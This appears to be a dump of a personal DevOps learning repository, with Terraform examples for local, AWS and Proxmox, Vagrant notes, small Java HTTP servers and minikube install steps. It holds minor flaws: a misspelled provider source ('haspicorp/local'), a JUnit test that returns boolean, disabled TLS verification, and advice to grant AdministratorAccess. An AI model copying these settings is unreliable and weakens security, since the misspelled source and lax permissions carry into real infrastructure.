CONCEPTS 3 | 4 | # ================================================================== 5 | # Initial Terraform setup 6 | # ================================================================== 7 | 8 | # When `terraform init` is executed, this part is getting set up 9 | 10 | terraform { 11 | # Here include all the needed providers 12 | required_providers { 13 | # As an example we will use here the local provider and the AWS provider 14 | 15 | # A. Local provider 16 | local = { 17 | source = "haspicorp/local" 18 | version = "2.5.1" 19 | } 20 | 21 | # B. AWS provider 22 | aws = { 23 | source = "hashicorp/aws" 24 | version = "5.65.0" 25 | } 26 | } 27 | } 28 | 29 | # ================================================================== 30 | # Configure providers 31 | # ================================================================== 32 | 33 | # A. Configure local provider 34 | provider "local" { 35 | 36 | } 37 | 38 | # B. Configure AWS provider 39 | provider "aws" { 40 | region = "us-east-1" 41 | } 42 | 43 | # ================================================================== 44 | # Configure Resources 45 | # ================================================================== 46 | 47 | # Syntax: 48 | # resource "type" "resource_name" { 49 | # 50 | # } 51 | # Remember `resource_name` is only a reference to Terraform, not the 52 | # actual resource name. 53 | 54 | resource "aws_instance" "web" { 55 | ami = "ami-someami" 56 | instance_type = "t2.micro" 57 | } -------------------------------------------------------------------------------- /IaC/Terraform/1-local/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !providers.tf 3 | !resources.tf 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /IaC/Terraform/1-local/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | 10 | provider "local" { 11 | # Configuration options 12 | } -------------------------------------------------------------------------------- /IaC/Terraform/1-local/resources.tf: -------------------------------------------------------------------------------- 1 | resource "local_file" "foo" { 2 | count = 2 # Number of files 3 | 4 | filename = "${path.module}/dummy-file-${count.index}" 5 | content = "This file contains dummy data ${count.index}" 6 | } -------------------------------------------------------------------------------- /IaC/Terraform/2-tfstate-backends/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !providers.tf 3 | !resources.tf 4 | !statefile/ 5 | !.gitignore 6 | -------------------------------------------------------------------------------- /IaC/Terraform/2-tfstate-backends/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | # =============================================== 3 | # Specify here the backend 4 | # =============================================== 5 | 6 | # Option 1: Local Backend (default) 7 | backend "local" { 8 | path = "./statefile/terraform.tfstate" 9 | } 10 | 11 | # Option 2: Remote Backend (e.g. S3) 12 | # backend "s3" { 13 | # region = "us-east-1" 14 | # bucket = "bucket-name" 15 | # key = "path/to/key" 16 | # } 17 | # =============================================== 18 | 19 | required_providers { 20 | local = { 21 | source = "hashicorp/local" 22 | version = "2.5.2" 23 | } 24 | } 25 | } 26 | 27 | provider "local" { 28 | # Configuration options 29 | } -------------------------------------------------------------------------------- /IaC/Terraform/2-tfstate-backends/resources.tf: -------------------------------------------------------------------------------- 1 | resource "local_file" "foo" { 2 | filename = "${path.module}/dummy-file" 3 | content = "This file contains dummy data" 4 | } -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !.gitignore 4 | !*.tfvars -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/custom.tfvars: -------------------------------------------------------------------------------- 1 | resource_custom_tfvars = "From inside the custom.tfvars" -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/production.auto.tfvars: -------------------------------------------------------------------------------- 1 | resource_auto_tfvars = "From inside the production.auto.tfvars" -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | 10 | provider "local" { 11 | # Configuration options 12 | } -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/resources.tf: -------------------------------------------------------------------------------- 1 | # This is a local variable 2 | locals { 3 | files_directory = "${path.module}" 4 | file_extension = "txt" 5 | } 6 | 7 | resource "local_file" "foo" { 8 | filename = "${local.files_directory}/${var.resource_name}.${local.file_extension}" 9 | 10 | # This is also a way to add multiline content 11 | content = < provider.identifier.resource 37 | sensitive = false 38 | } 39 | 40 | 41 | -------------------------------------------------------------------------------- /IaC/Terraform/3-variables/terraform.tfvars: -------------------------------------------------------------------------------- 1 | resource_tfvars = "From inside the terraform.tfvars" -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !local-file/ 5 | !.gitignore 6 | -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/output.tf: -------------------------------------------------------------------------------- 1 | output "output_filename" { 2 | description = "File name" 3 | value = local_file.foo.filename 4 | sensitive = false 5 | } 6 | 7 | output "output_filecontext" { 8 | description = "File filecontext" 9 | value = local_file.foo.content 10 | sensitive = true 11 | } 12 | 13 | -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | 10 | # provider "local" { 11 | # # Configuration options 12 | # } -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/resources.tf: -------------------------------------------------------------------------------- 1 | resource "local_file" "foo" { 2 | filename = var.filename 3 | content = var.filecontext 4 | } -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/terraform.tfvars: -------------------------------------------------------------------------------- 1 | filename = "filename.txt" 2 | filecontext = "filecontext" -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/local-file/variables.tf: -------------------------------------------------------------------------------- 1 | variable "filename" { 2 | description = "File name" 3 | type = string 4 | default = "default.txt" 5 | } 6 | 7 | variable "filecontext" { 8 | description = "File filecontext" 9 | type = string 10 | default = "default" 11 | } -------------------------------------------------------------------------------- /IaC/Terraform/4-modulles/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | local = { 4 | source = "hashicorp/local" 5 | version = "2.5.2" 6 | } 7 | } 8 | } 9 | # ======================================================== 10 | # Use the module 11 | module "create_local_file" { 12 | # Where the module is located 13 | source = "./local-file" 14 | 15 | # Modify internal variables 16 | filename = "${path.module}/use-module-filename.txt" 17 | filecontext = "use-module-content" 18 | } 19 | 20 | # It can also be reused 21 | module "create_local_file2" { 22 | # Where the module is located 23 | source = "./local-file" 24 | 25 | # Modify internal variables 26 | filename = "${path.module}/second.txt" 27 | filecontext = "use-module-content-2" 28 | } 29 | 30 | # ======================================================== 31 | # Finally can use outputs from the module 32 | output "local" { 33 | value = [ 34 | module.create_local_file.output_filename, 35 | module.create_local_file.output_filecontext, 36 | ] 37 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/README.md: -------------------------------------------------------------------------------- 1 | # Terraform - AWS 2 | 3 | ## Create Access Keys to connect via AWS cli 4 | 5 | ### 1. Create IAM user 6 | 1. Login to AWS 7 | 2. Search for `IAM` 8 | 3. In `User Managment` 9 | 4. `Users` 10 | 5. `Create User` * 11 | 6. Give username 12 | 7. Provide `Management Console` [ ] 13 | 8. `Next` 14 | 9. Permissions options set to `Attach policies directly` 15 | 10. Give the permissions that you want (e.g. `AdministratorAccess`) 16 | 11. `Next` 17 | 12. `Create User` 18 | 13. DONE! 19 | 20 | ### 2. Create Access Keys 21 | 1. Login to AWS 22 | 2. Search for `IAM` 23 | 3. In `User Managment` 24 | 4. `Users` 25 | 5. `Create access key` 26 | 6. `Command Line Interface (CLI)` 27 | 7. `Next` 28 | 8. Give a description tag 29 | 9. `Next` 30 | 10. DONE! 31 | 32 | Store now the Access Keys credentials 33 | -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !.gitignore 5 | !s3-files/ -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/outputs.tf: -------------------------------------------------------------------------------- 1 | output "output_ubuntu_instance" { 2 | value = [ 3 | for instance in aws_instance.ec2_ubuntu_instance : 4 | "ssh -i ~/.ssh/${var.ec2_key_pair_name} ubuntu@${instance.public_ip}" 5 | ] 6 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "5.93.0" 6 | } 7 | } 8 | } 9 | 10 | provider "aws" { 11 | # Configuration options 12 | region = "us-east-1" 13 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/terraform.tfvars: -------------------------------------------------------------------------------- 1 | ec2_key_pair_name = "TODO" 2 | ec2_key_pair_public_key = "TODO" -------------------------------------------------------------------------------- /IaC/Terraform/aws/ec2/variables.tf: -------------------------------------------------------------------------------- 1 | variable "ec2_key_pair_name" { 2 | description = "The name of the key pair that we will use to connect to the EC2" 3 | type = string 4 | default = "" 5 | } 6 | 7 | variable "ec2_key_pair_public_key" { 8 | description = "The key pair public value" 9 | type = string 10 | default = "" 11 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/s3/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !*.tfvars 4 | !.gitignore 5 | !s3-files/ -------------------------------------------------------------------------------- /IaC/Terraform/aws/s3/private-bucket.tf: -------------------------------------------------------------------------------- 1 | # Create bucket 2 | resource "aws_s3_bucket" "tf_s3_private_bucket" { 3 | bucket = "this-example-private-bucket-1234321" 4 | 5 | tags = { 6 | Name = "My bucket" 7 | Environment = "Dev" 8 | } 9 | } 10 | 11 | # Upload all files from s3-files/ directory 12 | resource "aws_s3_object" "tf_s3_private_objects" { 13 | # This is the name of the bucket 14 | bucket = aws_s3_bucket.tf_s3_private_bucket.bucket 15 | 16 | # Parse each file in the ./s3-files/ dir 17 | for_each = fileset("./s3-files", "**") 18 | 19 | # The name of the file when uploaded 20 | key = "${each.key}" # The name of each file 21 | 22 | # The path of the file 23 | source = "./s3-files/${each.key}" 24 | } -------------------------------------------------------------------------------- /IaC/Terraform/aws/s3/providers.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "5.93.0" 6 | } 7 | } 8 | } 9 | 10 | provider "aws" { 11 | # Configuration options 12 | region = "us-east-1" 13 | } -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !main.tf 3 | !README.md 4 | !terraform.tfvars 5 | !variables.tf 6 | !.gitignore -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | proxmox = { 4 | source = "Telmate/proxmox" 5 | version = "3.0.1-rc6" 6 | } 7 | } 8 | } 9 | 10 | provider "proxmox" { 11 | pm_api_url = var.pm_api_url 12 | pm_api_token_id = var.pm_api_token_id 13 | pm_api_token_secret = var.pm_api_token_secret 14 | pm_tls_insecure = true 15 | pm_debug = true 16 | } 17 | 18 | # Example template names: 'ubuntu-desktop-template' 19 | # This should exist on your Proxmox server as linked-clone ready template 20 | 21 | # VM 1: Ubuntu Server 22 | resource "proxmox_vm_qemu" "ubuntu_server" { 23 | name = "ubuntu-server-vm" 24 | vmid = 645 # FIXME: Make sure that it is available 25 | 26 | target_node = var.pm_target_node 27 | clone = var.template_vm 28 | full_clone = true 29 | 30 | # IMPORTANT make sure qemu agent is installed in the VM template 31 | # If this is set to 1 and it is NOT properly enabled on the template 32 | # then you will NOT be able to boot 33 | agent = 1 # <--- Required for IP discovery (See below) 34 | 35 | cores = 2 36 | memory = 2048 37 | 38 | disk { 39 | # FIXME: these values maybe need to be updated 40 | size = "40G" 41 | type = "disk" 42 | storage = "local-lvm" 43 | slot = "scsi0" 44 | discard = true 45 | } 46 | 47 | boot = "order=scsi0;net0" 48 | bootdisk = "scsi0" 49 | 50 | network { 51 | id = 0 52 | model = "virtio" 53 | bridge = var.network_bridge 54 | firewall = false 55 | link_down = false 56 | } 57 | } 58 | 59 | output "ubuntu_server_ip" { 60 | value = proxmox_vm_qemu.ubuntu_server.default_ipv4_address 61 | } 62 | -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/terraform.tfvars: -------------------------------------------------------------------------------- 1 | pm_api_url = "https://X.X.X.X:8006/api2/json" # FIXME: Adjust to your Proxmox 2 | pm_api_token_id = "terraform@pam!tf_token" # FIXME: Adjust to your Proxmox 3 | pm_api_token_secret = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" # FIXME: Adjust to your Proxmox 4 | pm_target_node = "pve" # FIXME: Adjust to your Proxmox node 5 | network_bridge = "vmbr0" 6 | 7 | template_vm = "vm-template" # FIXME: Adjust to your needs 8 | -------------------------------------------------------------------------------- /IaC/Terraform/proxmox/clone-from-template-vm/variables.tf: -------------------------------------------------------------------------------- 1 | # General Proxmox settings 2 | variable "pm_api_url" { 3 | description = "Proxmox API URL, e.g. https://X.X.X.X:8006/api2/json" 4 | type = string 5 | } 6 | 7 | variable "pm_api_token_id" { 8 | description = "Proxmox API Token ID, e.g. terraform@pam!token" 9 | type = string 10 | } 11 | 12 | variable "pm_api_token_secret" { 13 | description = "Secret for the Proxmox API Token" 14 | type = string 15 | sensitive = true 16 | } 17 | 18 | variable "pm_target_node" { 19 | description = "Target Proxmox node name to deploy the VM" 20 | type = string 21 | } 22 | 23 | variable "network_bridge" { 24 | description = "Network bridge to connect VMs (e.g., vmbr0)" 25 | type = string 26 | } 27 | 28 | # Template names (must exist in Proxmox) 29 | variable "template_vm" { 30 | description = "Template name for VM" 31 | type = string 32 | } 33 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | !*.tf 4 | 5 | # Only for this dummy example 6 | !*.tfvars 7 | 8 | !modules/ 9 | !modules/* 10 | 11 | !README.md -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/README.md: -------------------------------------------------------------------------------- 1 | FIXME: WORK IN PROGRESS NOT READY YET 2 | 3 | This is a complete runnable Terraform project that demonstrates: 4 | 5 | - Providers 6 | - Resources 7 | - Variables 8 | - Outputs 9 | - Locals 10 | - Modules 11 | - Data sources 12 | - Provisioners 13 | - Lifecycle meta-arguments 14 | - Input Validation 15 | - Sensitive Outputs -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/data.tf: -------------------------------------------------------------------------------- 1 | data "null_data_source" "example_data" { 2 | inputs = { 3 | name = "Sample Data" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/locals.tf: -------------------------------------------------------------------------------- 1 | locals { 2 | environment = "production" 3 | } 4 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/main.tf: -------------------------------------------------------------------------------- 1 | module "dummy" { 2 | source = "./modules/dummy" 3 | example_name = var.example_name 4 | example_count = var.example_count 5 | } 6 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/main.tf: -------------------------------------------------------------------------------- 1 | resource "null_resource" "example" { 2 | count = var.example_count 3 | 4 | provisioner "local-exec" { 5 | command = "echo Hello from ${var.example_name}!" 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/outputs.tf: -------------------------------------------------------------------------------- 1 | output "example_message" { 2 | value = "This is an example message from the module" 3 | } 4 | -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/terraform.tfvars: -------------------------------------------------------------------------------- 1 | example_name = "Terraform Module" 2 | example_count = 3 -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/modules/dummy/variables.tf: -------------------------------------------------------------------------------- 1 | variable "example_name" { 2 | description = "The name of the example resource" 3 | type = string 4 | default = "Default Example" 5 | } 6 | 7 | variable "example_count" { 8 | description = "The number of resources to create" 9 | type = number 10 | default = 1 11 | } -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/outputs.tf: -------------------------------------------------------------------------------- 1 | output "example_message" { 2 | value = module.dummy.example_message 3 | } -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/providers.tf: -------------------------------------------------------------------------------- 1 | provider "null" { 2 | # version = "3.1.0" 3 | } 4 | 5 | provider "random" { 6 | # version = "3.1.0" 7 | } -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/terraform.tfvars: -------------------------------------------------------------------------------- 1 | example_name = "Root Module Example" 2 | example_count = 2 -------------------------------------------------------------------------------- /IaC/Terraform/structure-template/variables.tf: -------------------------------------------------------------------------------- 1 | variable "example_name" { 2 | description = "The name of the example" 3 | type = string 4 | default = "Root Example" 5 | } 6 | 7 | variable "example_count" { 8 | description = "The number of resources" 9 | type = number 10 | default = 2 11 | } 12 | 13 | variable "example_map" { 14 | description = "A sample map variable" 15 | type = map(string) 16 | default = { 17 | "key1" = "value1" 18 | "key2" = "value2" 19 | } 20 | } -------------------------------------------------------------------------------- /IaC/Vagrant/README.md: -------------------------------------------------------------------------------- 1 | # Vagrant 2 | This directory contains notes, related to [vagrant](https://www.vagrantup.com/). 3 | 4 | ## Installation 5 | ``` 6 | wget -O - https://apt.releases.hashicorp.com/gpg | sudo gpg --dearmor -o /usr/share/keyrings/hashicorp-archive-keyring.gpg 7 | echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list 8 | sudo apt update && sudo apt install vagrant 9 | ``` 10 | **CAUTION: in order to leverage vagrant, make sure that either vmware or virtualbox is installed on your system.** 11 | 12 | ## Addons 13 | Install addons: 14 | `vagrant plugin install ` 15 | 16 | * `hostmanager` 17 | Adds in the /etc/hosts of the VMs any other VMs that exist in the same `Vagrantfile`. 18 | ``` 19 | vagrant plugin install vagrant-hostmanager 20 | ``` 21 | 22 | ## Initialization 23 | 24 | Visit [vagrant discover](https://portal.cloud.hashicorp.com/vagrant/discover) to find the desired box. Then copy its name and run the following command: 25 | `vagrant init ` 26 | 27 | e.g. To utilize an ubuntu focal64 box run: 28 | `vagrant init ubuntu/focal64 --box-version 20240821.0.1` 29 | 30 | A `Vagrantfile` will be appeared in the same directory. 31 | 32 | ## Useful commands: 33 | 34 | * Start the VM 35 | `vagrant up` 36 | 37 | * Power off the VM 38 | `vagrant halt` 39 | 40 | * Status (of the VM exist in this particular dir) 41 | `vagrant status` 42 | 43 | * Status of all VMs 44 | `vagrant global-status` 45 | 46 | * Reboot VM 47 | `vagrant reload` 48 | 49 | * Delete VM 50 | `vagrant destroy` 51 | 52 | * List downloaded boxes 53 | `vagrant box list` 54 | 55 | * Login to the VM 56 | `vagrant ssh # If only one vm exists, then this is optional` 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /IaC/Vagrant/multi-vms/Vagrantfile: -------------------------------------------------------------------------------- 1 | Vagrant.configure("2") do |config| 2 | # Define the first VM using CentOS 3 | config.vm.define "centos_vm" do |centos| 4 | centos.vm.box = "centos/8" # CentOS 8 5 | # centos.vm.network "private_network", type: "dhcp", ip: "192.168.33.10" # Static IP on private network 6 | centos.vm.network "public_network" # Bridged to the external network 7 | centos.vm.provider "virtualbox" do |vb| 8 | vb.memory = "800" # 600 MB of memory 9 | end 10 | 11 | # Shared folder 12 | centos.vm.synced_folder "./cent01", "/vagrant/cent01" 13 | 14 | # Provisioning section for CentOS 15 | centos.vm.provision "shell", inline: <<-SHELL 16 | # Example provisioning script for CentOS 17 | echo "Provisioning CentOS VM" 18 | SHELL 19 | end 20 | 21 | # ========================================================================== 22 | 23 | # Define the second VM using Ubuntu 24 | config.vm.define "ubuntu_vm1" do |ubuntu1| 25 | ubuntu1.vm.box = "ubuntu/bionic64" # Ubuntu 18.04 LTS 26 | # ubuntu1.vm.network "private_network", type: "dhcp", ip: "192.168.33.11" # Static IP on private network 27 | ubuntu1.vm.network "public_network" # Bridged to the external network 28 | ubuntu1.vm.provider "virtualbox" do |vb| 29 | vb.memory = "700" # 600 MB of memory 30 | end 31 | 32 | # Shared folder 33 | ubuntu1.vm.synced_folder "./ubu01", "/vagrant/ubu01" 34 | 35 | # Provisioning section for Ubuntu 1 36 | ubuntu1.vm.provision "shell", inline: <<-SHELL 37 | # Example provisioning script for Ubuntu 38 | echo "Provisioning Ubuntu VM" 39 | SHELL 40 | end 41 | end 42 | -------------------------------------------------------------------------------- /Java/Maven-http-server/.gitignore: -------------------------------------------------------------------------------- 1 | tomcat.*/ 2 | target/ -------------------------------------------------------------------------------- /Java/Maven-http-server/README.md: -------------------------------------------------------------------------------- 1 | # Simple HTTP Server using Maven 2 | This codebase can be used as a template or a testing point for the evaluation of other tools 3 | 4 | ## Useful Commands 5 | | Command | Description | 6 | | ------- | ------------| 7 | | `mvn clean` | Clean the project (delete the target directory) | 8 | | `mvn compile` | Compile the Project | 9 | | `mvn exec:java` | Run the Project | 10 | | `mvn package` | Package the project into a JAR | 11 | | `mvn clean package` | Everytime we make changes to `pom.xml` run this | 12 | | `mvn checkstyle:check` | Create checkstyle report | -------------------------------------------------------------------------------- /Java/Maven-http-server/checkstyle.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Java/Maven-http-server/src/main/java/com/example/App.java: -------------------------------------------------------------------------------- 1 | package com.example; 2 | 3 | import org.apache.catalina.LifecycleException; 4 | import org.apache.catalina.startup.Tomcat; 5 | 6 | import java.io.File; 7 | import java.util.ArrayList; 8 | import java.util.List; 9 | import java.util.concurrent.ExecutorService; 10 | import java.util.concurrent.Executors; 11 | import java.util.logging.Level; 12 | import java.util.logging.Logger; 13 | 14 | public class App { 15 | private static final Logger LOGGER = Logger.getLogger(App.class.getName()); 16 | 17 | public static void main(String[] args) { 18 | int serverCount = 3; // Number of Tomcat instances 19 | int basePort = 57890; 20 | 21 | ExecutorService executor = Executors.newFixedThreadPool(serverCount); 22 | List servers = new ArrayList<>(); 23 | 24 | for (int i = 0; i < serverCount; i++) { 25 | int port = basePort + i; 26 | TomcatServer server = new TomcatServer(port); 27 | servers.add(server); 28 | executor.submit(server); 29 | } 30 | 31 | // Allow servers to run in parallel 32 | executor.shutdown(); 33 | } 34 | } 35 | 36 | class TomcatServer implements Runnable { 37 | private final int port; 38 | 39 | public TomcatServer(int port) { 40 | this.port = port; 41 | } 42 | 43 | @Override 44 | public void run() { 45 | try { 46 | Tomcat tomcat = new Tomcat(); 47 | tomcat.setPort(port); 48 | tomcat.getConnector().setProperty("address", "0.0.0.0"); 49 | 50 | String webappDir = new File("src/main/webapp").getAbsolutePath(); 51 | tomcat.addWebapp("/", webappDir); 52 | 53 | tomcat.start(); 54 | System.out.println("Tomcat server started on http://0.0.0.0:" + port); 55 | tomcat.getServer().await(); 56 | } catch (LifecycleException e) { 57 | Logger.getLogger(TomcatServer.class.getName()).log(Level.SEVERE, "Error starting Tomcat on port " + port, e); 58 | } 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /Java/Maven-http-server/src/test/java/com/example/AppTest.java: -------------------------------------------------------------------------------- 1 | package com.example; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import static org.junit.jupiter.api.Assertions.*; 5 | 6 | public class AppTest { 7 | 8 | @Test 9 | public boolean testAppStarts() { 10 | return true; 11 | } 12 | } -------------------------------------------------------------------------------- /Java/Simple-http-server/README.md: -------------------------------------------------------------------------------- 1 | # Simple HTTP Java server 2 | This project can be used for java related server verifications 3 | 4 | ## Prerequisites 5 | - \>= Java 17 6 | `sudo apt install openjdk-17-jdk -y` 7 | 8 | ## Steps to Use the Server 9 | 1. Compile code 10 | `javac SimpleHttpServer.java` 11 | 12 | 2. Run the server 13 | `java SimpleHttpServer` 14 | 15 | 3. Open a browser and go to: 16 | `http://localhost:8080` -------------------------------------------------------------------------------- /Java/Simple-http-server/SimpleHttpServer.java: -------------------------------------------------------------------------------- 1 | import com.sun.net.httpserver.HttpExchange; 2 | import com.sun.net.httpserver.HttpHandler; 3 | import com.sun.net.httpserver.HttpServer; 4 | 5 | import java.io.IOException; 6 | import java.io.OutputStream; 7 | import java.net.InetSocketAddress; 8 | import java.nio.file.Files; 9 | import java.nio.file.Path; 10 | 11 | public class SimpleHttpServer { 12 | public static void main(String[] args) throws IOException { 13 | int port = 8080; 14 | HttpServer server = HttpServer.create(new InetSocketAddress(port), 0); 15 | server.createContext("/", new FileHandler()); 16 | server.setExecutor(null); 17 | server.start(); 18 | System.out.println("Server started on port " + port); 19 | } 20 | 21 | static class FileHandler implements HttpHandler { 22 | @Override 23 | public void handle(HttpExchange exchange) throws IOException { 24 | Path filePath = Path.of("index.html"); 25 | if (!Files.exists(filePath)) { 26 | String response = "404 Not Found"; 27 | exchange.sendResponseHeaders(404, response.length()); 28 | try (OutputStream os = exchange.getResponseBody()) { 29 | os.write(response.getBytes()); 30 | } 31 | return; 32 | } 33 | 34 | byte[] fileBytes = Files.readAllBytes(filePath); 35 | exchange.sendResponseHeaders(200, fileBytes.length); 36 | try (OutputStream os = exchange.getResponseBody()) { 37 | os.write(fileBytes); 38 | } 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /Java/maven.md: -------------------------------------------------------------------------------- 1 | # Maven 2 | 3 | Build process 4 | ```mermaid 5 | graph LR 6 | 7 | source["**Source Code** 8 | Java"] 9 | 10 | compile["**Compile** 11 | javac"] 12 | 13 | test["**Tests** 14 | Unit/Integration"] 15 | 16 | package["**Packaging** 17 | jar, war, exe"] 18 | 19 | checks["**Checks** 20 | Code Analysis"] 21 | 22 | 23 | source --> compile 24 | compile --> test 25 | test --> package 26 | package --> checks 27 | ``` 28 | 29 | ## Creating a Project 30 | ```bash 31 | mvn archetype:generate -DgroupId=com.example.app -DartifactId=my-maven-app -DarchetypeArtifactId=maven-archetype-quickstart -DarchetypeVersion=1.5 -DinteractiveMode=false 32 | ``` 33 | 34 | ## [Maven Phases](https://maven.apache.org/guides/getting-started/maven-in-five-minutes.html) 35 | - validate 36 | - compile 37 | - test 38 | - package 39 | - integration-test 40 | - verify 41 | - install 42 | - deploy 43 | 44 | ## Useful Commands 45 | | Command | Description | 46 | | ------- | ------------| 47 | | `mvn compile` | Compile the Project | 48 | | `mvn package` | Package the project into a JAR | 49 | | `mvn exec:` | Run the Project | 50 | | `mvn clean` | Clean the project (delete the target directory) | 51 | | `mvn clean package` | Everytime we make changes to `pom.xml` run this | 52 | 53 | -------------------------------------------------------------------------------- /Kubernetes/configuration-files/hello-nginx.yml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 # API version for the Kubernetes Deployment object 2 | kind: Deployment # Specifies the type of Kubernetes object 3 | 4 | # Metadata contains identifying information about the deployment 5 | metadata: 6 | name: nginx-deployment # Name of the Deployment 7 | labels: 8 | app: nginx # Label to organize and select this resource 9 | 10 | # Specification for Deployment 11 | spec: 12 | replicas: 2 # Number of desired Pod replicas to run 13 | 14 | selector: # Selector defines how the Deployment finds which Pods to manage 15 | matchLabels: 16 | app: nginx # Select Pods with the label "app: nginx" 17 | 18 | # Template for the Pods that will be created by this Deployment 19 | template: 20 | metadata: 21 | labels: 22 | app: nginx # Assigns the "app: nginx" label to Pods 23 | 24 | # Specification for Pod 25 | spec: 26 | containers: 27 | - name: nginx # Name of the container inside the Pod 28 | image: nginx:1.21 # Docker image to use for this container (nginx version 1.21) 29 | ports: 30 | - containerPort: 80 # Port that the container exposes (typically HTTP) 31 | -------------------------------------------------------------------------------- /Kubernetes/minikube.md: -------------------------------------------------------------------------------- 1 | # Minikube 2 | 3 | ## Installation 4 | Install Minicude instructions [here](https://minikube.sigs.k8s.io/docs/start/?arch=%2Flinux%2Fx86-64%2Fstable%2Fbinary+download) 5 | 6 | 7 | ### Debian system 8 | ```bash 9 | # Install Docker 10 | curl -fsSL get.docker.com -o get-docker.sh && sh get-docker.sh && rm get-docker.sh 11 | sudo groupadd docker 12 | sudo usermod -aG docker $USER 13 | newgrp docker 14 | 15 | # Install minikube 16 | curl -LO https://github.com/kubernetes/minikube/releases/latest/download/minikube-linux-amd64 17 | sudo install minikube-linux-amd64 /usr/local/bin/minikube && rm minikube-linux-amd64 18 | 19 | # Kubectl 20 | curl -LO "https://dl.k8s.io/release/$(curl -sL https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" 21 | sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl && rm kubectl 22 | ``` 23 | 24 | ## Start cluster 25 | ```bash 26 | minikube start 27 | ``` 28 | 29 | ## Configuration 30 | The configuration is available in the `~/.kube/config` 31 | 32 | ## Cleanup 33 | ```bash 34 | minikube stop 35 | minikube delete 36 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Spyridakis Christos 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 